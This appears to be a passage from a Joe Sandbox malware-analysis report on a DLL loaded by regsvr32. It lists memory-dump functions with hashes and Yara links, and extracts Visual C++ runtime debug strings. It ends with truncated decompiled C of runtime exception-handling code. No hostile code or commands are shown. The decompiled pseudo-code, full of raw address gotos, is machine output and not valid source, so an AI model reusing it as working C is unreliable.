                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180018FE8 Relevance: .1, Instructions: 94COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 00ebc5b3581f268e1dca31b076cde8af601d69c20f797ec800b8524e8aca152a
                                • Instruction ID: 71fd5f9204d30feec7a15df1bf9f79d56724cbe4fb23e8fa5a2523106a8ad13f
                                • Opcode Fuzzy Hash: 00ebc5b3581f268e1dca31b076cde8af601d69c20f797ec800b8524e8aca152a
                                • Instruction Fuzzy Hash: 2C51B2B080034E9FCB48CFA8D48A4DEBFF0FB58398F245619E859A6250D3749695CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800011F4 Relevance: .1, Instructions: 90COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1f4f6e8d1d7fb1cefad6bab8572f86962bf991beacb3f1c3af335354cec980e2
                                • Instruction ID: 13dd754d1e7aaa458ccf3f25f1a53950ed55eb7a2af7c94b5f3f3eca6f4c7b71
                                • Opcode Fuzzy Hash: 1f4f6e8d1d7fb1cefad6bab8572f86962bf991beacb3f1c3af335354cec980e2
                                • Instruction Fuzzy Hash: 4141B3B090434E8FCB48DF68C48A4CE7FB0FB58398F204619E856A6250D3B496A5CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180003460 Relevance: .1, Instructions: 85COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b99b47e9b962ad4e889b98a468eb4c97838fe937d78fd3ed328a07435872d91a
                                • Instruction ID: 25ea7a1fae7cee08e525b2e53d13b9e761fafe3c3046f9c16da3d4363f6b727f
                                • Opcode Fuzzy Hash: b99b47e9b962ad4e889b98a468eb4c97838fe937d78fd3ed328a07435872d91a
                                • Instruction Fuzzy Hash: 7641F0B090078E8BCF48CF68C88A4DE7FB0FB48358F54461DE86AA6350D3B49664CF85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000406C Relevance: .1, Instructions: 85COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 83981cbbf60b78e7deea3e04e91402b42a32efa8c5dfd88cb8f56556e6fb0c3c
                                • Instruction ID: 2f3c92175ef08bfcd336efc03048a581a759bd19a61f5d08681f8b59d2b4a65d
                                • Opcode Fuzzy Hash: 83981cbbf60b78e7deea3e04e91402b42a32efa8c5dfd88cb8f56556e6fb0c3c
                                • Instruction Fuzzy Hash: CA41EF70508B898FE3A8DF29C48950BBBF2FBC5354F104A1DF69686360D7B5D845CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180019788 Relevance: .1, Instructions: 83COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 94030778b375274538e88af110c4c71a5f626c7493089532c44927a023a09910
                                • Instruction ID: 881360cf52284626b478287e7223753f8540b5b8a242225130398fb52c45b4e6
                                • Opcode Fuzzy Hash: 94030778b375274538e88af110c4c71a5f626c7493089532c44927a023a09910
                                • Instruction Fuzzy Hash: 9141B1B090034E8FCF48CF68C48A5DEBFB0FB68398F214619E855A6250D3B496A5CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001B6D4 Relevance: .1, Instructions: 79COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 93974b6d4f6273d20610df347467165d2a5c3046e1daec97411395bd01693f1f
                                • Instruction ID: 9c4ff176952ec0d3a7c23327861baecbe751e07bc56d6e6d0065064954d6898b
                                • Opcode Fuzzy Hash: 93974b6d4f6273d20610df347467165d2a5c3046e1daec97411395bd01693f1f
                                • Instruction Fuzzy Hash: D93113B0508B84CBD7B4DF24C08979ABBE0FBC4758F608A1CE5D9C6261DBB4984DDB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180012EF8 Relevance: .1, Instructions: 77COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 613fb402d6b778ceaf7e513f493c666c428009a0501ff02ca6debf04feb91865
                                • Instruction ID: 2086fc6cf530452ca317dde1c3f5989bf97dc2ab51b7d711b1b7619edf53518f
                                • Opcode Fuzzy Hash: 613fb402d6b778ceaf7e513f493c666c428009a0501ff02ca6debf04feb91865
                                • Instruction Fuzzy Hash: 9A4107B090034D9FCF48DF68C89A5DEBFB1FB48358F10865DE96AA6250D3B49664CF84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000E7A0 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a391d5f1ee034caf47bfedc7cfbee3ee0130da0d99d6425c5f03999ced993457
                                • Instruction ID: 1338ccaed59e81eda3dfb0132a5285c9e75a0d4e8ad1c64b0ac71650cc1258ea
                                • Opcode Fuzzy Hash: a391d5f1ee034caf47bfedc7cfbee3ee0130da0d99d6425c5f03999ced993457
                                • Instruction Fuzzy Hash: 5541E4B190075ECFCF44CFA8D88A4CE7BF0FB08358F144619E869A6210D3B49658CF99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180010C84 Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd33be4bf54c8c25dddb299aef1f30db163f836ea6c92e4bd2e4a70074cec26c
                                • Instruction ID: 90c54515c462ca516bd1a7834683e0366852147f904ce70d700c1fd94530822e
                                • Opcode Fuzzy Hash: fd33be4bf54c8c25dddb299aef1f30db163f836ea6c92e4bd2e4a70074cec26c
                                • Instruction Fuzzy Hash: D33198B16187848BD788DF28D44941ABBE1FBDC30CF405B1DF4CAAA360D7789644CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800247FC Relevance: .1, Instructions: 61COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4dc2512c0ff6dc22a4fb7ff1d0ea1563faee4dc38c2ddbd287c0bb24e1b40528
                                • Instruction ID: 9655ad274102c7f9d75b202b541ab5cd2305fe15ce58f1dcda736dbe1a9cecaf
                                • Opcode Fuzzy Hash: 4dc2512c0ff6dc22a4fb7ff1d0ea1563faee4dc38c2ddbd287c0bb24e1b40528
                                • Instruction Fuzzy Hash: 3B2146B46183858B8389DF28D04A41ABBE1FBCC308F905B1DF4CAAB254D77896558B4B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000EAC0 Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 443cbba6f5f89cfce6496fb7e303af42859a42b87001d497a7063cf79c72ec44
                                • Instruction ID: 28a8b9ee08791f4b35668e747dad36529c2fac2b53c208ad34d18e94405bcf7a
                                • Opcode Fuzzy Hash: 443cbba6f5f89cfce6496fb7e303af42859a42b87001d497a7063cf79c72ec44
                                • Instruction Fuzzy Hash: 8E21D870529784ABC788DF18C58A55ABBF0FBC5758F80691DF8C686251C7B4D906CB43
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001479C Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b24567682a71932b9bd3cac4b142caf72f763870487d30b345218c61caa1d775
                                • Instruction ID: 3473a0eaf58d43c1d16632198f29a9e85fcf3b0d6ee31105f780c840bc6bd29d
                                • Opcode Fuzzy Hash: b24567682a71932b9bd3cac4b142caf72f763870487d30b345218c61caa1d775
                                • Instruction Fuzzy Hash: 0E2148741087848FC398EF28C08A41BBBE0BB9C35CF400B1DF4CAA7265D7B8D6558B0A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2F7F1 Relevance: 79.1, APIs: 23, Strings: 22, Instructions: 376COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                • API String ID: 242677333-579931786
                                • Opcode ID: a63f40807382e4d475d486b4876b23bc4dd58b7e370bc0180856c528c8acbbda
                                • Instruction ID: e2526957761dd222599413fd0adc35655d47e080d41718875d9293ce759d4dec
                                • Opcode Fuzzy Hash: a63f40807382e4d475d486b4876b23bc4dd58b7e370bc0180856c528c8acbbda
                                • Instruction Fuzzy Hash: FC32E83290CA8695E7B0CB18EC543EE73A0F784345FA04126D6CD47AA9DB7EE549CF81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2B470 Relevance: 40.5, APIs: 7, Strings: 16, Instructions: 260COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_error$FileModuleName
                                • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                • API String ID: 1949418964-1840610800
                                • Opcode ID: b12b1314681225994c561f9efc1de4d9c7126b4e593a535ef46bdf2ab838bdf2
                                • Instruction ID: 897ec7a8548006b51d3f4e24293aa6cb0eb1e7b087e1f77fa43b78bf07c27b58
                                • Opcode Fuzzy Hash: b12b1314681225994c561f9efc1de4d9c7126b4e593a535ef46bdf2ab838bdf2
                                • Instruction Fuzzy Hash: 32F1F636609BC294EAB4CB54E8483AEB3E4F384780F604125DACD43BB9DB7ED185CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2AE40 Relevance: 38.7, APIs: 5, Strings: 17, Instructions: 207COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_error$_invalid_parameter
                                • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                • API String ID: 2356156361-2279852085
                                • Opcode ID: 6f4650fd4357eea9b956771a13d9b8a3362ab7c768ecc2367610c4505c6cb5c5
                                • Instruction ID: d03840f3f998d79993f45302fffdb67e29e7bb822786765b29bb528846abb06c
                                • Opcode Fuzzy Hash: 6f4650fd4357eea9b956771a13d9b8a3362ab7c768ecc2367610c4505c6cb5c5
                                • Instruction Fuzzy Hash: 9DC1E87250DBC681E7B48B15E8403EEA3E1F389784F614126E6CD42BA9DB7ED155CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2CB4F Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 174fileCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: FileHandleWrite
                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                • API String ID: 3320372497-2837547082
                                • Opcode ID: bb867b9cd4420929bdb9afde1297a67263cb8f1db9c8fa78cbb90456e5291ccd
                                • Instruction ID: 981f8f0912e596e51d2e9e4fc62e3c1b144262c9e2c6e30392df3237f0075012
                                • Opcode Fuzzy Hash: bb867b9cd4420929bdb9afde1297a67263cb8f1db9c8fa78cbb90456e5291ccd
                                • Instruction Fuzzy Hash: 9491FE31A1CA8685EBA0DB64E8943BE63E0F384784F604126D6CD47AB9DF3FE545CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D312E3 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 102libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                • API String ID: 2574300362-564504941
                                • Opcode ID: 6419c91a8387a46f3245e2fe33ee525fa99a19ae0c1292820c60068700cd62ec
                                • Instruction ID: ae2d570b6cae00db451c80d1d2e323a85726552741c7696ed6bf884c957359fe
                                • Opcode Fuzzy Hash: 6419c91a8387a46f3245e2fe33ee525fa99a19ae0c1292820c60068700cd62ec
                                • Instruction Fuzzy Hash: 0F51A735A08A8286E7A09B19FC5476E73E4F784751F605035DACE43A74DF7EE488CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D376C0 Relevance: 33.3, APIs: 22, Instructions: 322COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                • String ID:
                                • API String ID: 641786319-0
                                • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                • Instruction ID: 27f88887327b6a70fd6681a1572ed994cc0fbf2c3fc8410d15a0bdfd36c78ba8
                                • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                • Instruction Fuzzy Hash: 7402F432A0CEC5C1D6A09B15E8903AEB7A0F7857A5F604226E6DD47BE9DF3ED445CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D340B0 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 341COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 20%
                                			E000007FE7FEF9D340B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
				long long _v24;
				long long _v32;
				char _v56;
				long long _v64;
				long long _v72;
				char _v80;
				void* _v88;
				void* _v96;
				intOrPtr _v104;
				void* _v112;
				intOrPtr _v120;
				void* _v128;
				char _v132;
				char _v136;
				long long _v144;
				signed int _v152;
				char _v160;
				signed char _v164;
				signed int _v168;
				char _v176;
				char _v184;
				long long _v192;
				signed char _v200;
				long long _v208;
				signed int _v216;
				signed int _v224;
				long long _v232;
				void* _t222;
				void* _t244;
				void* _t295;
				long long _t302;
				long long _t303;
				intOrPtr _t311;
				long long _t312;
				long long _t321;
				intOrPtr _t325;
				long long _t329;
				long long _t330;
				long long _t332;

				_t295 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v164 = 0;
				_v152 = 0;
				_v168 = E000007FE7FEF9D33B40(_a40, _a32);
				E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v160);
				if (_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40) <= 0) goto 0xf9d34176;
				r9d = _v168;
				E000007FE7FEF9D33BD0(_t217,  &_v160, _a32, _a40);
				r9d = _v168;
				E000007FE7FEF9D33C00(_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
				goto 0xf9d34197;
				_v168 = E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40);
				if (_v168 - 0xffffffff < 0) goto 0xf9d341b1;
				if (_v168 - _a40[1] >= 0) goto 0xf9d341b1;
				goto 0xf9d341b6;
				_t222 = E000007FE7FEF9D2CF80(_a40);
				if ( *_a8 != 0xe06d7363) goto 0xf9d34398;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d34398;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d34213;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d34213;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d34398;
				_t302 = _a8;
				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0xf9d34398;
				0xf9d24000();
				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0xf9d3423a;
				goto 0xf9d34862;
				0xf9d24000();
				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
				_a8 = _t303;
				0xf9d24000();
				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
				_v164 = 1;
				E000007FE7FEF9D2E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
				if (E000007FE7FEF9D3D2C0(1, _a8) == 0) goto 0xf9d34290;
				goto 0xf9d34295;
				E000007FE7FEF9D2CF80(_a8);
				if ( *_a8 != 0xe06d7363) goto 0xf9d342fa;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d342fa;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d342e6;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d342e6;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d342fa;
				_t311 = _a8;
				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0xf9d342fa;
				E000007FE7FEF9D2CF80(_t311);
				0xf9d24000();
				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0xf9d34398;
				0xf9d24000();
				_t312 =  *((intOrPtr*)(_t311 + 0x108));
				_v144 = _t312;
				0xf9d24000();
				 *((long long*)(_t312 + 0x108)) = 0;
				if ((E000007FE7FEF9D35BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0xf9d34349;
				goto 0xf9d34398;
				if ((E000007FE7FEF9D35CC0(_v144) & 0x000000ff) == 0) goto 0xf9d34393;
				E000007FE7FEF9D35AB0(1, _a8);
				E000007FE7FEF9D34870( &_v56, "bad exception");
				E000007FE7FEF9D3D320(__edi, __esi, __esp,  &_v56, 0xf9d4a160);
				goto 0xf9d34398;
				E000007FE7FEF9D2CF50(_t312);
				if ( *_a8 != 0xe06d7363) goto 0xf9d347d9;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d347d9;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d343f5;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d343f5;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d347d9;
				if (_a40[3] <= 0) goto 0xf9d3466c;
				_v216 = _a32;
				_v224 =  &_v132;
				_t321 =  &_v136;
				_v232 = _t321;
				r9d = _v168;
				r8d = _a56;
				E000007FE7FEF9D2EA30(_a16, _a40);
				_v128 = _t321;
				goto 0xf9d3447e;
				_v136 = _v136 + 1;
				_v128 = _v128 + 0x14;
				if (_v136 - _v132 >= 0) goto 0xf9d3466c;
				if ( *_v128 - _v168 > 0) goto 0xf9d344b3;
				_t325 = _v128;
				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0xf9d344b5;
				goto 0xf9d3445a;
				E000007FE7FEF9D2E680( *((intOrPtr*)(_t325 + 4)), _t325);
				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
				_v120 =  *((intOrPtr*)(_v128 + 0xc));
				_v120 = _v120 - 1;
				_t329 = _v112 + 0x14;
				_v112 = _t329;
				if (_v120 <= 0) goto 0xf9d34667;
				_t244 = E000007FE7FEF9D2E6A0(_v120 - 1, _t329);
				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
				_v96 = _t330;
				E000007FE7FEF9D2E6A0(_t244, _t330);
				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
				goto 0xf9d3457e;
				_v104 = _v104 - 1;
				_t332 = _v96 + 4;
				_v96 = _t332;
				if (_v104 <= 0) goto 0xf9d34662;
